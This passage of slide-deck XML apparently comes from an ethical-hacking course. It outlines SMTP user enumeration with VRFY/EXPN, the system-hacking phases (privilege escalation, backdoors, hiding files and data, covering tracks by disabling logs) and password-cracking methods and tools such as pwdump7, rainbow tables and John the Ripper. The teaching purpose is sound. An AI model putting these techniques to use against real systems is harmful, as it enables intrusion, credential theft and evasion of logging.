                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>POP3 110/995, IMAP 143/993, SMTP 25</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If thre is no such user, we will get back an email ;) with its headers and info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>elnet &lt;server&gt; 25</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Search for SMTP commands (specially VRFY jadi, or EXPN jadi to check if a list of users are active on the server)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>smtp-user-enum</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Problem with open SMTP relays</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51"/>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System hacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;306;p51"/>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Escalating Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bug, config problem, exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Executing applications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Backdoors, rootkits, Remote access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hiding Files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>All above should be hidden! Obviously. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And hiding connection (say hiding data being transmitted. Payload in ping, steganography, ..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Covering Tracks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Covering footprints, logs, or even turning off the whole logging while we are working, windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Google Shape;307;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792550" y="2081550"/>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a:t>Gaining Access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Password attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>default</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Non Electronic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Active online attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="3" marL="2286000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Brute Force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="3" marL="2286000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dictionary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="3" marL="2286000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Passive online attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="3" marL="2286000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sniffing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="3" marL="2286000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>MITM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Offline attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="3" marL="2286000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rainbow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="3" marL="2286000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Brute Force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Escalating Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Executing applications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hiding Files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Covering Tracks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2"/>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cracking 1/4</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13" name="Google Shape;313;p52"/>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Some that one person can remember to prove herself to the system</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Numbers, letters, upper/lower, names, words, short passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cracking Techniques:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dictionary Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Brute Force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hybrid (Dict + other steps)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Syllable Attack (Dict + brute force)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rule based attack (favorite numbers, names)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Passive Online Attack (Wireshark, MITM)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Active Online Attack (Guessing, malware, keylogger, hash injection, phishing)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Offline Attacks (Weak storing)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Non technical</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3"/>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cracking 2/4</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19" name="Google Shape;319;p53"/>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Passive Online Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Packet sniffing (Sniffer, packet analyzer)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Happens in one collision domain, unless you do spoofing (later)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Telnet, FTP, SMTP, rlogin, SNMPv1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Man In the Middle Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Browser Exploitation Framework (BeEF)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SSL Strip, mitmproxy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Replay Attack</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p54"/>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cracking 3/4</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25" name="Google Shape;325;p54"/>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Active</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Online Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Guessing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>create potential parts, rank them and test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Trojan, spyware, keylogger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hash Injection (On windows, pwdump7.exe will dump hashes)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Offline Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Precomputed hashes / rainbow (winrtgen + rcrack_gui.exe)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Brute force (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>John the ripper)</a:t>
            </a:r>
